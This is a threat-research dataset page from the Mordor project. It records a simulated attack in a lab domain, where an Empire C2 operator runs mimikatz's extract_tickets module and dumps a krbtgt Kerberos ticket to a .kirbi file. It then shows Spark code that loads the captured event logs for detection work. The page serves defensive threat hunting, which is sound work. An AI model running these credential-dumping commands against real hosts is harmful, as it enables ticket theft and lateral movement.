Empire Mimikatz Extract Kerberos Keys

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2019/09/21

Tactics

[‘TA0006’]

Techniques

[‘T1003.004’]

Tags

[‘Kerberos Tickets’]

Dataset Description

This dataset represents adversaries extracting kerberos tickets from memory.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

extract_tickets

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
WE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5972   5/0.0    2020-09-22 07:35:29  http            

(Empire: agents) > interact WE8XYD3K
(Empire: WE8XYD3K) > usemodule credentials/mimikatz/extract_tickets
(Empire: powershell/credentials/mimikatz/extract_tickets) > info

              Name: Invoke-Mimikatz extract kerberos tickets.
            Module: powershell/credentials/mimikatz/extract_tickets
        NeedsAdmin: False
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  @JosephBialek
  @gentilkiwi

Description:
  Runs PowerSploit's Invoke-Mimikatz function to extract
  kerberos tickets from memory in base64-encoded form.

Comments:
  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com

Options:

  Name  Required    Value                     Description
  ----  --------    -------                   -----------
  Agent True        WE8XYD3K                  Agent to run module on.                 

(Empire: powershell/credentials/mimikatz/extract_tickets) > execute
[*] Tasked WE8XYD3K to run TASK_CMD_JOB
[*] Agent WE8XYD3K tasked with task ID 1
[*] Tasked agent WE8XYD3K to run module powershell/credentials/mimikatz/extract_tickets
(Empire: powershell/credentials/mimikatz/extract_tickets) > 
Job started: PY68ZG

Hostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # standard::base64
isBase64InterceptInput  is false
isBase64InterceptOutput is false

mimikatz(powershell) # kerberos::list /export

[00000000] - 0x00000012 - aes256_hmac      
  Start/End/MaxRenew: 9/22/2020 3:31:24 AM ; 9/22/2020 1:31:24 PM ; 9/29/2020 3:31:24 AM
  Server Name       : krbtgt/THESHIRE.LOCAL @ THESHIRE.LOCAL
  Client Name       : pgustavo @ THESHIRE.LOCAL
  Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; 
  * Saved to file     : 0-40e10000-pgustavo@krbtgt~THESHIRE.LOCAL-THESHIRE.LOCAL.kirbi

(Empire: powershell/credentials/mimikatz/extract_tickets) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_mimikatz_extract_keys.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |3684 |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |3478 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |2316 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |903  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |847  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |400  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |254  |
|WORKSTATION6.theshire.local|security                                |4658   |244  |
|WORKSTATION6.theshire.local|security                                |4690   |122  |
|WORKSTATION6.theshire.local|security                                |4656   |122  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |87   |
|WORKSTATION6.theshire.local|security                                |4703   |71   |
|WORKSTATION5.theshire.local|security                                |4658   |70   |
|WORKSTATION6.theshire.local|security                                |4663   |59   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |53   |
|WORKSTATION5.theshire.local|security                                |4663   |35   |
|WORKSTATION5.theshire.local|security                                |4656   |35   |
|WORKSTATION5.theshire.local|security                                |4690   |35   |
|WORKSTATION6.theshire.local|security                                |5158   |34   |
|MORDORDC.theshire.local    |Security                                |5156   |33   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows